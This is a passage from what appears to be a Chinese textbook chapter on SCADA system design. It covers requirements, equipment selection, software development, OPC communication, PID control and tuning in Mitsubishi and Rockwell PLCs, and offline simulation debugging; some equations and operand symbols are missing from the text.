SCADA系统的实时性,表现在对内部和外部事件能快速、及时的响应,并做出相应的处理,不丢失信息,不延误操作。计算机处理的事件一般分为两类:一类是定时事件,如数据的定时采集、运算、调度与控制等;另一类是随机事件,如事故、报警等。对于定时事件,系统设置查询时钟,保证定时处理。对于随机事件,系统设置中断,并根据故障的轻重缓急,预先分配中断级别,一旦事故发生,保证优先处理紧急故障。 在SCADA系统中,不同的监控层面对实时性的要求是不一样的,下位机系统对实时性的要求最高,而监控层对实时性的要求较低。在系统设计时,要合理确定系统的实时性要求,分配相应的资源来处理实时性事件,一方面保证实时性要求高的任务得以执行,又要确保系统的其他任务也能及时执行。 4.开放性 由于SCADA系统多是采用系统集成的办法实现的,即系统的软、硬件是不同厂家的产品,因此,首先要保证所选用设备具有较好的开放性,以方便系统的集成;其次,SCADA系统作为企业综合自动化系统的最底层,既要向上层MES或ERP系统提供数据,也要接受这些系统的调度,因此,SCADA系统整体也必须是开放的。此外,系统的开放性还是实现系统功能扩展和升级的重要基础。在系统设计时一定要避免所设计的系统是“自动化孤岛”,导致系统的功能得不到充分发挥。 5.经济性 在满足SCADA系统性能指标(如可靠性、实时性、开放性)的前提下,尽可能地降低成本,保证性能价格比较高,为用户节约成本。 此外,还要尽可能地提高系统投运后的产出,即为企业创造一定的经济效益和社会效益,这才是SCADA系统的最大作用,也是用户最欢迎的。 6.可操作性与可维护性 操作方便表现在操作简单、直观形象和便于掌握,且不要求操作工一定要熟练掌握计算机知识才能操作。对于一些升级的系统,在新系统设计时要兼顾原有的操作习惯。 可维护性体现在维修方便,易于查找和排除故障。系统应多采用标准的功能模块式结构,便于更换故障模块,并在功能模块上安装工作状态指示灯和监测点,便于维修人员检查。另外,有条件的话,配置故障检测与诊断程序,用来发现和查找故障。 在系统设计时坚持以人为本是确保系统具有可操作性和可维护性的重要手段和途径。 8.3 SCADA系统设计与开发步骤 SCADA系统的设计与开发要比一般的PLC控制系统要复杂许多。SCADA系统的设计与开发主要包括3个部分的内容:上位机系统设计与开发、下位机系统设计与开发、通信网络的设计与开发。SCADA系统的设计与开发具体内容会随系统规模、被控对象、控制方式等不同而有所差异,但系统设计与开发的基本内容和主要步骤大致相同。一个完整的SCADA系统设计与开发步骤如图8.1所示。 8.3.1 SCADA系统需求分析与总体设计 在进行设计前,首先要深入了解生产过程的工艺流程、特点;主要的检测点与控制点及它们的分布情况;明确控制对象所需要实现的动作与功能;确定控制方案;了解业主对监控系统是否有特殊的要求;了解用户对系统安全性与可靠性的需要;了解用户的使用和操作要求;了解用户的投资概算等。 图8.1 SCADA系统设计与开发步骤示意图 在了解这些基本信息后,就可以开始总体设计。首先要统计系统中所有的I/O点,包括模拟量输入、模拟量输出、数字量输入、数字量输出等,确定这些点的监控要求,如控制、记录、报警等,表8.1给出了模拟量输入信号列表,表8.2给出了数字量输入信号列表。在此基础上,根据监控点的分布情况确定SCADA系统的拓扑结构,主要包括上位机的数量和分布、下位机的数量和分布、网络与通信设备等。在SCADA系统中,拓扑结构很关键,一个好的拓扑结构可以确保系统的监控功能被合理分配,网络负荷均匀,有利于系统功能的发挥和稳定运行。拓扑结构确定后,就可以初步确定SCADA系统中上位机的功能要求与配置,上位机系统的安装地点和监控中心的设计;确定下位机系统的配置及其监控设备和区域分布;确定通信设备的功能要求和可能的通信方式及其使用和安装条件;在这3个方面确定后,编写相应的技术文档,和业主及相关的技术人员对总体设计进行论证,以优化系统设计。至此,SCADA系统的总体设计就初步完成了。 表8.1 模拟量输入信号列表 表8.2 数字量输入信号列表 在SCADA系统设计时,还要注意系统功能的实现方式,即系统中的一些监控功能既能由硬件实现,也能由软件实现。因此,在系统设计时,硬件和软件功能的划分要综合考虑,以决定哪些功能由硬件实现,哪些功能由软件来完成。一般采用硬件实现时速度比较快,可以节省CPU的大量时间,但系统会比较复杂、价格也比较高;采用软件实现比较灵活、价格便宜,但要占用CPU较多的时间,实时性也会有所降低。所以,一般在CPU时间允许的情况下,尽量采用软件实现,如果系统控制回路较多、CPU任务较重,或某些软件设计比较困难,则可考虑用硬件完成。这里可以举一个例子,在三菱电机FX和Q系列控制系统中,有专门的温度控制硬件模块,即该模块内有PID等控制算法。因此,在进行温度控制时,可以直接采用这样的模块,这就是硬件控制方案。若不采用这样的模块,而是利用PID指令编写温度控制程序并下载到CPU中,就属于采用软件的方式实现温度控制。此外,软PLC控制也是一种典型的用软件来替代硬件控制的方案。 总体设计后将形成系统的总体方案。总体方案确认后,要形成文件,建立总体方案文档。系统总体设计文件通常包括以下内容: (1)主要功能、技术指标、原理性方框图及文字说明。 (2)SCADA系统总体通信网络结构、性能与配置。 (3)上、下位机的配置、功能及性能,数据库的选用。 (4)主要的测控点和控制回路;控制策略和控制算法设计,例如PID控制、解耦控制、模糊控制和最优控制等。 (5)系统的软件功能确定与模块划分,主要模块的功能、结构及流程图。 (6)安全保护设计,联锁系统设计。 (7)抗干扰和可靠性设计。 (8)机柜或机箱的结构设计,电源系统设计。 (9)中控室设计,操作台设计。 (10)经费和进度计划的安排。 对所提出的总体设计方案要进行合理性、经济性、可靠性及可行性论证。论证通过后,便可形成作为系统设计依据的系统总体方案图、表和设计任务书,以指导具体的系统设计、开发与安装工作。 8.3.2 SCADA系统类型确定与设备选型 与其他的控制系统相比,SCADA系统的设备选型范围更广,灵活性更大。在进行设备选型前,首先要确定所选用的系统类型。由于SCADA系统解决方案的多样性,因此,要通过深入地分析,在满足用户需求的前提下,为用户选择一个性/价比较高的系统,让最终用户满意。 1.系统类型的确定 一般而言,SCADA系统上位机选择通常是商用计算机或工控机,再配置服务器。主要的不同体现在下位机和通信网络。几种主要的下位机有: (1)PLC或PAC—适合于模拟量比较少,数字量较多的应用。 (2)各种RTU—适合于监控点极为分散,且每个监控点I/O点不多的应用。 (3)具有通信接口的仪表—适合于以计量为主的应用,如热电厂热能供应计量和监控等。 (4)PLC与分布式模拟量采集模块混合系统—适合于模拟与数字混合系统,用户对系统价格比较敏感,且模拟量控制要求不高的应用。 (5)其他各种专用的下位机控制器,如本书9.4.3节介绍的抽油机控制器。 当然,对于一些小的系统可以采取集中监控方式,即硬件选用商用机或工控机计算机,再配置各种数据采集板卡或远程数据采集模块,应用软件采用通用软件,如Visual Basic、Visual C++等开发。 上述下位机系统中,多数都具有系列化、模块化、标准化结构,有利于系统设计者在系统设计时根据要求任意选择,像搭积木般地组建系统。这种方式能够提高系统开发速度,提高系统的技术水平和性能,增加可靠性,也有利于系统维护。 与一般的计算机控制系统相比,SCADA系统中通信方式最为多样和复杂,其包含的通信网络和层次也比较多,特别是对于大型SCADA系统。通信系统的详细选型与设计可以参考本书第2章。 2.设备选型 SCADA系统的设备选型包括以下几个部分。 1)上位机系统选型 上位机系统选型主要选择监控主机、操作计算机、服务器及相应的网络、打印、UPS等设备。计算机品牌较多,可以选择在CPU主频、内存、硬盘、显示卡、显示器等各方面满足要求的品牌计算机。当然,若对可靠性要求更高,可以选择工控机。一般而言,工控机的配置要比商用机的配置要低一些(同样配置的工控机与商用机比较,工控机的上市时间更晚)。设计人员可根据要求合理地进行选型。监控中心的计算机多配置大屏幕显示器。在许多大型SCADA系统监控、调度中心,一般都配置有大屏幕显示系统或模拟屏,以方便对系统的监控和调度,但这些设备要专门的厂家来设计制造。 上位机在选型时还要考虑组态软件、数据库和其他应用软件,以满足生产监控和全厂信息化管理对数据存储、查询、分析和打印等的要求。 2)下位机选型 根据所确定的下位机类型,选择相应的产品。下位机产品的选择范围极广,现有的绝大多数产品都能满足一般SCADA系统对下位机的功能要求。建议选择主流厂商的主流产品,这样维护、升级、售后服务都有保证,系统开发时能有足够的技术支持和参考资料。而且这类产品用量大,用户多,其性能可以得到保证。 下位机选择时,要特别注意下位机的控制器模块的内存容量、工作频率(扫描时间)、编程方式与语言支持、通信接口和组网能力等,以确保下位机有足够的数据处理能力、控制精度与速度,方便程序开发和调试。下位机的选择还要考虑到所选用的组态软件是否支持该设备。 在进行I/O设备选择时,要注意I/O设备的通道数、通道隔离情况、信号类型与等级等。对于模拟量模块还要考虑转换速率与转换精度。下位机系统数字量I/O设备选型时,对于输出模块,要注意根据控制装置的特性选择继电器模块、晶体管模块还是晶闸管,要注意电压等级和负载对触点电流的要求;对于输入模块,要注意是选源型设备还是漏型设备(如果有这方面的要求)。另外,还要注意特殊功能模块与通信模块的选择。 在下位机系统,要注意I/O设备与现场检测与执行机构之间的隔离,特别是在化工、石化等场合,要使用安全栅等设备。对于数字量输入和输出,可以使用继电器做电气隔离。 3)通信网络设备 SCADA系统中通信网络设备选型较复杂。首先在SCADA系统中,有运用于下位机的现场总线或设备级总线;有实现下位机联网的现场总线;有连接各个下位机与上位机的有线或无线通信。特别是对于大范围长距离通信,通常要借助于电信的固定电话网络或移动通信公司的无线网络进行数据传输,而这会造成一些用户不可控的因素。例如,通信质量受制于这些服务提供商的服务水平。因此,在选择通信方式时,尽量选择用户可以掌控的通信方式和通信介质。通信系统的通信设备与介质的选择主要要满足数据传输对带宽、实时性和可靠性的要求。对于通信可靠性要求高的场合,可以考虑用不同的通信方式冗余。如有线通信与无线通信的冗余,以有线为主,无线通信做后备。 4)仪表与控制设备 仪表与控制设备主要包含传感器、变送器和执行机构的选择。这些装置的选择是影响控制精度的重要因素之一。根据被控对象的特点,确定执行机构采用何种类型,应对多种方案进行比较,综合考虑工作环境、性能、价格等因素择优而用。 检测仪表可以将流量、速度、加速度、位移、湿度等信号转换为标准电量信号。对于同样一个被测信号,有多种测量仪表能满足要求。设计人员可根据被测参数的精度要求、量程、被测对象的介质类型与特性和使用环境等来选择检测仪表。为了减少维护工作量,可以尽量选用非接触式测量仪表,这也是目前仪表选型的一个趋势。对于一些检测点,只关心定性的信息时,可以选用开关量检测设备,如物位开关、流量开关、压力开关等,以降低硬件设备费用。 执行机构是控制系统中必不可少的组成部分,它的作用是接受计算机发出的控制信号,并把它转换成调节机构的动作,使生产过程按预先规定的要求正常运行。 执行机构分为气动、电动和液压3种类型。气动执行机构的特点是结构简单、价格低、防火防爆;电动执行机构的特点是体积小、种类多、使用方便;液压执行机构的特点是推力大、精度高。另外,还有各种有触点和无触点开关,也是执行机构,能实现开关动作。执行机构选型时要注意被控系统对执行机构的响应速度与频率等是否有要求。 8.3.3 SCADA系统应用软件开发 SCADA系统的软件包括系统软件与应用软件。系统软件有运行于上位机的操作系统软件、数据库管理软件及服务器软件;下位机的系统软件主要是各种控制器中内置的系统软件,这些软件会随着设备制造商的不同而不同,但部分控制器设备,如PAC会选用微软的WinCE或其他商用的嵌入式操作系统。系统软件特别是上位机系统软件的稳定性是SCADA系统上位机稳定运行的基础,必须选用正版的操作系统软件,注意软件的升级和维护。另外还要注意上位机应用软件对操作系统的版本和组件要求。 SCADA系统功能很大程度上取决于系统的应用软件性能。为了确保系统的功能发挥和可靠性,应该科学设计SCADA系统的应用软件。SCADA系统的应用软件主要包括上位机的人机界面、通信软件、下位机中的程序,甚至还包括那些专门开发的设备驱动程序。不论是上位机应用软件还是下位机应用软件的设计,都要基于软件工程方法,采用面向对象与模块化结构等技术。编程前要画出程序总体流程图和各功能模块流程图,再选择程序开发工具,进行软件开发。要认真考虑功能模块的划分和模块的接口,设计合理的数据结构与类型。在下位机应用软件设计开发时,要根据程序组织单元相关的知识,合理设计功能、功能块和程序等程序组织单元。 SCADA系统的数据类型可分为逻辑型、数值型与符号型。逻辑型主要用于处理逻辑关系或用于程序标志等。数值型可分为整数和浮点数。整数有直观、编程简单、运算速度快的优点,其缺点是表示的数值动态范围小,容易溢出。浮点数则相反,数值动态范围大、相对精度稳定、不易溢出,但编程复杂、运算速度低。 在程序设计时,构件合理的数据结构类型可以明显提高程序的可读性,加强程序的封装,提高程序重用性。目前主流的上位机的组态软件和下位机的编程软件都支持用户自定义数据结构。 1.上位机应用软件配置与开发 上位机软件包括上位机上多个节点的应用软件。由于大型的SCADA系统中,各种功能的计算机较多,因此上位机应用软件的配置与开发也是多样的。组态软件是设计上位机人机界面的首先工具。上位机应用软件配置与开发包括: (1)将组态软件配置成“盲节点”或将其功能简化为“I/O服务器”,这两种节点通常不配置操作员界面,从而更好地进行数据采集。 (2)SCADA服务器应用软件开发与配置。大型SCADA系统中配置一台或多台SCADA服务器来汇总多个“I/O服务器”的数据,因此要进行相关的组态工作。 (3)监控中心操作站人机界面开发。操作站是人机接口,是操作和管理人员对监控过程进行操作和管理的平台,因此,要开发出满足功能要求的人机界面。SCADA系统人机界面通常不与现场的控制器通信,其数据主要来源于SCADA服务器。关于采用组态软件开发人机界面的内容见本书5.7节。 (4)数据库软件配置与各种报表、管理软件开发。 在上位机人机界面软件开发中,还可以选用高级语言或一些专业数据采集软件。 采用高级语言编程的优点是编程效率高,不必了解计算机的指令系统和内存分配等问题。其缺点是,编制的源程序经过编译后,可执行的目标代码比完成同样功能的汇编语言的目标代码长得多,一方面占用内存量增多,另一方面使得执行时间增加很多,往往难于满足实时性的要求。针对汇编语言和高级语言各自的优缺点,可用混合语言编程,即系统的界面和管理功能等采用高级语言编程,而实时性要求高的控制功能则采用汇编语言编程。 典型的数据采集软件有美国国家仪器公司的图形化编程语言LabView和文本编程语言LabWindows/CVI,以及HP公司的HP VEE等。这些软件更多的是面向测控领域,在SCADA系统中应用比较少。 2.下位机软件开发 下位机对被监控的过程、设备进行直接控制,因此,软件的设计与开发极为重要。在进行下位机软件设计时,主要要选择合理的设计方法和编程语言。 下位机软件的设计方法主要有经验法、逻辑设计方法、状态流程图法和利用移位寄存器法等几种。 1)经验法 经验设计法对于一些比较简单的控制系统设计是比较奏效的,可以收到快速、简单的效果。但是,由于这种方法主要是依靠设计人员的经验进行设计,所以对设计人员的要求也比较高,特别是要求设计者有一定的实践经验,对工业控制系统和工业上常用的各种典型环节比较熟悉。经验设计法没有规律可遵循,具有很大的试探性和随意性,往往需经多次反复修改和完善才能符合设计要求,所以设计的结果往往不很规范,因人而异。 经验法一般只适合于较简单的或与某些典型系统相类似的控制系统的设计,或者用于某些复杂程序的局部设计(如设计一个功能块)。如果用来设计复杂系统梯形图,存在以下问题: (1)考虑不周、设计麻烦、设计周期长。用经验设计法设计复杂系统的梯形图程序时,要用大量的中间元件来完成记忆、联锁、互锁等功能,由于需要考虑的因素很多,它们往往又交织在一起,分析起来非常困难,并且很容易遗漏一些问题。修改某一局部程序时,很可能会对系统其他部分程序产生意想不到的影响,往往花了很长时间,还得不到一个满意的结果。此外,经验法设计的程序一般系统性、整体性差。 (2)程序的可读性差、可重用性、可维护性差。经验法设计程序一般都采用梯形图编程语言。这些梯形图是按设计者的经验和习惯的思路进行设计。因此,即使是设计者的同行,要分析这种程序也非常困难,更不用说维修人员了,这给PLC系统的维护和改进带来许多困难。采用梯形图设计的程序一般结构较差,影响了程序的可重用。 2)逻辑设计方法 逻辑设计的基本含义是以逻辑组合的方法和形式设计控制程序。这种方法有严密可循的规律性、明确可行的设计步骤,又具有简便、直观和十分规范的特点,属于系统化的设计方法。其基本设计步骤如下: (1)明确控制任务和控制要求。通过分析机械装置、工艺过程和控制要求,取得工作循环图、检测元件分布图与执行元件动作节拍表。分配下位机I/O地址。 (2)绘制控制系统状态转换表。 (3)进行系统逻辑设计。 (4)根据控制特点和要求,选择合适的编程语言,编写控制软件。 (5)程序的调试和修改。 3)状态流程图法 状态流程图,又叫状态转移图,是完整地描述控制系统的工作过程、功能和特性的一种图形,是分析和设计控制系统程序的重要工具。所谓“状态”都是具有特定功能的,状态的流程或转移,实际上就是控制系统的功能的转换。状态流程图由状态、转换、转换条件和动作、命令等组成。利用状态流程图设计控制程序的步骤是: (1)按照机械运动或工艺过程的工作内容、步骤、顺序和控制要求画出状态流程图。 (2)在状态流程图上以输入点或其他元件定义状态转换条件。当某转换条件的实际内容不止一个时,对每个具体内容定义一个元件(地址)编号,并以逻辑组合形式表现为有效转换条件。 (3)按照机械或工艺提供的电气执行元件功能表,在状态流程图上对每个状态和动作命令配上实现该状态或动作命令的控制功能的电气执行元件,并以对应的下位机输出点的地址定义这些电气执行元件。 4)利用移位寄存器设计 利用移位寄存器进行步进顺序控制程序的设计更为简便,同时设计的通用性也更强。这种设计方法主要是利用移位寄存器来充当控制系统的状态转换控制器,设计成单数据顺序循环移位,实现单步步进式的顺序控制。通过分析控制系统的输入信号状态,可以得到系统的状态转移主令信号组,这是设计步进顺序控制程序的关键。 在实际的控制软件编写时,特别是对于比较复杂的过程或设备的控制,可以通过任务分解的方法,把复杂的程序模块化,根据每个模块要实现的功能要求和特点,选用上述的一种方法设计,从而完成复杂控制程序的编写。 应用软件的编写还牵涉到编程语言。下位机可用IEC611131-3标准中的编程语言,有些还支持流程图(FC)编程语言。特殊情况下,要用C语言结合甚至汇编语言进行编程,以C语言为主,汇编语言为辅。 (1)本书第4章对IEC 61131-3编程语言已经做了详细介绍。当下位机是PLC、PAC或其他的一些控制器时,多数情况下这些控制器支持该标准中的一种或几种编程语言。有些基于PC的控制产品,还支持一些其他的编程语言,如德国倍福公司的产品TwinCAT。 (2)C语言与汇编语言。汇编语言是面向具体微处理器的。使用它能够具体描述控制运算和处理的过程;紧凑地使用内存;对内存和地址空间的分配比较清楚;能够充分发挥硬件的性能;所编软件运算速度快、实时性好。所以在自主开发的以单片机为主的下位机中,常采用C语言结合汇编语言进行软件开发。 3.上、下位机通信系统配置与组态 SCADA系统中,上、下位机的通信极为关键。通常,上、下位机通信相关的驱动程序、配置软件和其他的通信软件都由组态软件供应商、下位机供应商提供,相关的通信协议都封装在驱动程序或通信软件中,SCADA系统开发人员要熟悉这些软件的使用与配置,熟悉通信参数的意义与设置。在进行通信系统的开发和调试时,一定要确保通信中所要求的各种软件、驱动协议已经安装或配置,特别是那些属于操作系统的可选安装项。 对于那些组态软件还不支持的设备,可以采用组态软件厂家提供的设备驱动程序开发工具来开发专用的驱动程序,也可委托组态软件供应商开发。建议对这类设备开发OPC服务器,而不开发仅仅适用于某种组态软件的驱动程序。选用OPC服务器时,要注意所购买的OPC服务器支持的客户端数目。以霍尼韦尔PKS系统为例,若希望能利用Aspen Infoplus.21 数据库实现对PKS中的数据归档,同时还有一个先进控制软件也要与PKS通信,那么就要购买支持2个OPC客户端的OPC服务器授权。以PLC设备为例,在配置OPC服务器时,要注意OPC服务器上的参数配置与PLC中参数的一致性。此外,对于OPC服务器中项的参数配置,要特别注意数据类型、读写属性和地址。不同的PLC,需要配置的参数是不同的。具体如何配置,一定要参考相关的手册或文档。对于采用西门子PLC的SCADA系统,若采用OPC服务器时,最好在控制器中把要通信的一些数据,特别是模拟量参数放入到一个DB块中,这样可以简化OPC服务器中参数的配置,减少出错的概率。对于一些新的系统应用,可以考虑购买OPC UA规范的服务器。 上、下位机通信系统配置与组态更详细的内容可以参考本书第2章和第9章。 8.4 控制策略与PID算法 一般来说,在硬件系统确定后,计算机控制系统的控制效果的优劣,主要取决于采用的控制策略和控制算法是否合适。很多控制算法的选择与系统的数学模型有关,因此有条件的话可以建立对象的数学模型。所谓数学模型就是系统动态特性的数学表达式,它反映了系统输入、内部状态和输出之间的逻辑与数量关系,是控制系统的分析、综合与设计的重要基础和依据。每个特定的控制对象均有其特定的控制要求和规律,必须选择与之相适应的控制策略和控制算法,否则就会导致系统的品质不好,甚至会出现系统不稳定、控制失败的现象。 8.4.1 PID控制算法 比例、积分、微分控制(简称PID控制)是应用最广泛的一种控制规律。从控制理论可知,PID控制能满足相当多工业对象的控制要求。所以,它至今仍是一种基本的控制方法。为了更好地理解该控制规律,结合典型的简单控制系统加以介绍。简单控制系统的方框图如图8.2所示。 图8.2 简单控制系统方框图 PID控制规律的基本输入/输出关系可用微积分方程表示为 式中:u(t)—控制器的输出; e (t)—控制器的输入偏差信号, ,其中r(t)是设定值,c(t)是测量值; Kp —比例增益; Ti —积分时间; Td—微分时间。 由于计算机控制属于采样控制系统,因此将式(8-1)离散化。令t=nT,T为采样周期,且用T代替微分增量dt,用误差的增量Δe(nT)代替de(t),为书写方便,在不致引起混淆的场合,省略nT中的T,则有 式中:n——采样序号; e(n)第n次采样的偏差值,e(n)=r(n)-c(n)。 于是式(8-1)可写成 式(8-3)中的第一项起比例控制作用,称为比例(P)项;第二项起积分控制作用,称为积分(I)项;第三项起微分控制作用,称为微分(D)项;u0是偏差为零时的初值。这3种作用可单独使用(微分作用一般不单独使用)也可合并使用。常用的组合有:比例(P)控制、比例积分控制(PI)、比例微分控制(PD)和比例积分微分控制(PID)。 1.比例控制(P) 比例控制是最基本的控制规律,当负荷变化时,克服扰动能力强,控制作用及时,过渡过程时间短,但过渡过程结束时存在余差,且负荷变化越大余差也越大。比例控制作用于控制通道滞后较小、时间常数不太大、扰动幅度较小、负荷变化不大、控制质量要求不高、允许有余差的场合。如储灌液位、塔釜液位的控制和不太重要的蒸汽压力的控制等。 2.比例积分控制(PI) 在比例作用的基础上引入积分作用能够消除余差,因此比例积分控制是使用最多、应用最广泛的控制规律。但是,加入积分作用后要保持系统原有的稳定性,必须加大比例度(削弱比例作用),从而导致控制质量有所下降。如最大偏差和振荡周期相应增大,过渡时间加长。对于控制通道滞后小、负荷变化不太大、工艺上不允许有余差的场合,如流量或压力的控制,采用该规律可获得较好的控制质量。 3.比例微分控制(PD) 在比例作用基础上引入微分,会有超前作用,能使系统的稳定性增加,最大偏差和余差减小,加快了控制过程,改善了控制质量,适用于过程滞后较大的场合。对于滞后很小和扰动作用频繁的系统,应尽可能避免使用比例微分作用。 4.比例积分微分控制(PID) 微分作用对于克服容量滞后有显著效果,对克服纯滞后是无能为力的。在比例作用的基础上增加微分作用能提高系统的稳定性,如再加上积分作用还能消除余差。PID控制中有Kp 、Ti、Td这3个参数可调,因此可以使得系统获得较高的控制质量。它适合容量滞后大、负荷变化大、控制质量要求高的场合,如反应器、聚合釜的温度控制。 8.4.2 PLC中的PID控制指令 目前多数的控制器都有PID控制指令/模块,但它们的实现方式及参数设置各有不同,下面以三菱电机和Rockwell自动化公司A-B品牌PLC为例加以说明。 1.三菱电机PID指令及参数 三菱电机Q、FX2N和FX3U系列PLC中PID指令如图8.3所示。实际应用时,可以根据控制周期要求设定一个定时器,周期调用PID指令,进行PID控制。 PID指令中各操作数的含义是: 表示目标值(SV), 表示测量值, ~ +6设定PID控制器参数。 表示指令执行后PID运算结果(MV)所储存的寄存器。PID指令需要占用从 起始的29个数据寄存器,因此,在编程中,不能占用这些数据区。本例中占用D100~D128。需要注意的是控制用参数的设定值在PID运算前必须预先通过MOV等指令写入。表8.3是各参数的设定。需要说明的是,三菱电机的PID参数与式(8-3)中的意义有所不同,具体的参数意义与整定要看三菱电机PID指令手册。 表8.3 PID指令的参数设定 2.罗克韦尔自动化公司PID指令及参数 罗克韦尔自动化公司的SLC500等系列PLC的PID指令如图8.4所示,该指令中各参数含义如下: 图8.4 A-B公司PLC的PID运算指令 · Control Block(控制块),是一个数据文件,可以用整数文件,也可以用PID数据文件(PD)。主要用来储存PID状态、控制位、常数、内部使用参数。 · Process Variable(测量值),用来储存过程输入值的字地址。 · Control Variable (控制变量),用来储存PID控制器的输出数据。 · Control Block Length,占用N13:0~N13:22共23个字,用于储存PID执行过程中的各个参数。用户编程时可以指定其他的数据区,如N14等。 PID指令中参数设置窗口如图8.5所示,其中参数的含义如下: 图8.5 PID参数整定界面 · Controller Gain:即PID方程中的Kp,它所在的地址是N13:3。 · Reset Ti:即PID方程中的Ti,它所在的地址是 N13:4。 · Rate Td:即PID方程中的Td,它所在的地址是 N13:5。 · Loop Update:与PID control有关,因为此PID模块有两种时间工作模式即定时型和中断型。中断型的工作模式是受PLC中的定时中断控制,每扫描一次程序,执行PID模块指令一次,因此这种方式的工作频率很高;定时型的工作方式就是指定PID模块指令执行的间隔时间,即工作频率一定。这种工作方式比中断型灵活,可以根据具体的应用进行改变。图8.5中PID control参数指示的是定时型的时间工作方式,则Loop Update中是设定的具体间隔时间,此参数通常取对象时间常数的5~10倍。 · Control mode:PID误差的读取模式。一种是设定值减去过程变量(SP-PV),另一种为过程变量减去设定值(PV-SP)。 · PID Control:手动与自动切换的控制位。 · Time Mode:PLC定时型的时间工作方式,有TIME与STI两种选择。 · Limit Output CV:PID整定输出值(N7:40)输出大小的限制是否有效。如果选择YES,则Output Max、Output Min生效,需填入相应的最大、最小输出百分比。如果选择NO,则不生效。 · Deadband:死区设置。它所在地址为N13:9。 · Setpoint SP:被控变量设定值,即上文提及的SP。它所在地址为N13:2。 · Scaled Error SE:是Control Mode中设定公式(SP-PV或PV-SP)的计算值。它所在地址为N13:15。 · Setpoint MAX:调节设定值的最大输入值,一般取16383。它所在的地址为N13:7。 · Setpoint MIN:调节设定值的最小输入值。它所在的地址为N13:8。 · Output Max:PID控制输出最大值设定,以百分数的形式表示。它所在的地址为N13:11。 · Output Min:PID控制输出最小值设定,以百分数的形式表示。它所在的地址为N13:12。 在控制系统设计时,要确保设计出的系统具有闭环负反馈。而在控制系统中,可以调节系统反馈属性的主要是控制器的作用方向。在三菱电机PID指令中,是通过对 +1字的位0设置来实现的。对于前向操作,设置该位为0;对于后向操作,设置该位为1;而Rockwell自动化PLC的PID指令中,是通过设置误差的读取模式来实现的,这类似数字式控制器的作用方向设置,更加直观。当然,这个参数的设置还与执行器的作用方向有关,即针对图8.2所示的简单控制系统,要保证控制器(含比较器)、执行机构、对象和检测与变送环节的作用方向乘积的符号是“负”。 8.4.3 PID控制器参数整定 1.临界比例度法 先将控制器设置为纯比例作用(积分时间无穷大,微分时间置“0”位置),且比例度放在较大位置,将系统投入闭环控制,然后逐步减小比例度,通过改变设定值给系统施加一个阶跃扰动,直到控制系统出现等幅振荡的过渡过程,如图8.6所示。这时的比例度称为临界比例度Kδ,振荡周期就叫临界振荡周期TK。根据这两个数值查表8.4,得到相应的比例度、积分时间与微分时间。然后,将控制器的比例度换成整定后的值,依次放上积分时间和微分时间的整定值。可以得到的参数做实验观察系统影响,根据响应曲线再次对上述参数做微调。 图8.6 临界比例度法 表8.4 临界比例度法控制器参数计算 2.衰减振荡法 先将控制器设置为纯比例作用且比例度放在较大位置,将系统投入闭环控制,待系统稳定后,逐步减小比例度,改变设定值以施加阶跃扰动,观察过渡过程曲线,直到出现衰减比n=4的过渡过程,如图8.7所示。这时的比例度称为临界比例度Sδ,衰减周期为TS。根据这两个数值查表8.5,得到PID控制器的参数。 图8.7 4:1衰减曲线法 表8.5 衰减曲线法控制器参数计算(4:1衰减比) 3.用工具软件整定参数 目前多数品牌的PLC都提供了PID参数整定工具,在工具中,可以手工整定,也可以自动整定。这里简单介绍Rockwell自动化公司的PID参数整定工具RSTune。 RSTune是Rockwell公司提供的一个回路参数整定软件,利用它可方便、迅速、准确地整定PID控制回路,不必额外编程。使用该软件前要首先安装该软件及Rockwell自动化公司的其他配套编程与通信软件,并且要把程序下载到PLC中并运行。当把程序中PID指令所对应的Set point、Process Variable、Control Variable地址在软件中设置好以后,它可以实时显示当前这些参数对应的曲线。 从图8.8可以看到,在窗口的左半部,两种不同颜色的柱图分别代表过程变量PV和设定值SP,这样就可以直观清晰地观察到设定值和测量值的对比。同时,还可以看到控制输出CO(Control Output)的大小(用绿色柱图表示)。这3个量在窗口右半部分以实时趋势图方式显示。窗口左下方是设定的P、I和D参数以及自动或者手动后选择的新参数。需要注意的是,采取“自动”方式时,有可能当试验结束后,也不能得到一组满意的参数,这时就需要人工整定参数了。 图8.8 RSTune参数整定界面 8.5 SCADA系统调试与运行 SCADA系统的调试从内容上分包括上位机调试、下位机调试与通信调试;从项目进程上看可以分为离线仿真调试、现场离线调试、在线调试与运行阶段。离线仿真一般在实验室或非工业现场进行,而在线调试与运行调试都在工业现场进行。当在线调试及试运行一段时间,系统满足设计要求后,就可正式交付并投入生产运行。 8.5.1 离线仿真调试 1.硬件调试 对于SCADA系统中的各种硬件设备,包括下位机控制器、I/O模块、通信模块及各种特殊功能模块都要按照说明书检查主要功能。比如主机板(CPU板)上RAM区的读/写功能、ROM区的读出功能、复位电路、时钟电路等的正确性调试。对各种I/O模块要认真校验每个通道工作是否正常,精度是否满足要求。 对上位机设备,包括主机、交换机、服务器和UPS电源等要检查工作是否正常。 硬件调试还包括现场仪表和执行机构,如压力变送器、差压变送器、流量变送器、温度变送器和其他各种现场及控制室仪表,电动或气动执行器等,在安装前都要按说明书要求校验完毕。对于检测与变送仪表要特别注意仪表量程与订货要求是否一致。 硬件调试过程中发现的问题要及时查找原因,尽早解决。 2.软件调试 软件调试的顺序是子程序、功能模块和主程序。有些程序的调试比较简单,利用开发装置、仿真软件或计算机提供的调试程序就可以进行调试。为了减少软件调试的工作量,要确保在软件编写时,所有的子程序、功能模块等都经过测试,满足应用要求。否则,在软件调试阶段问题会较多,影响程序的总体调试。如果软件有很好的结构,在软件开发过程中都经过了充分的调试,则在软件联调中,问题会较少。这时调试的重点是模块之间参数传递、主程序与子程序调用等。主要观察系统联调后逻辑是否正确,能否完成预定的功能,而不是简单的语法等检查。 上位机的程序调试相对简单,因为在开发过程中,每个界面或功能是否符合要求可以通过把组态软件从开发环境切换到运行环境,观察功能实现。 3.系统仿真 在硬件和软件分别联调后,并不意味着系统的设计和离线调试已经结束,为此,必须再进行全系统的硬件、软件统调。这次统调试验,就是通常所说的“系统仿真”(也称为模拟调试)。所谓系统仿真,就是应用相似原理和类比关系来研究事物,也就是用模型来代替实际生产过程(即被控对象)进行实验和研究。系统仿真有以下3种类型:全物理仿真(或称在模拟环境条件下的全实物仿真);半物理仿真(或称硬件闭路动态试验);数字仿真(或称计算机仿真)。 系统仿真尽量采用全物理或半物理仿真。试验条件或工作状态越接近真实,其效果也就越好。对于纯数据采集系统,一般可做到全物理仿真;而对于控制系统,要做到全物理仿真几乎是不可能的,因此,控制系统只能做离线半物理仿真。 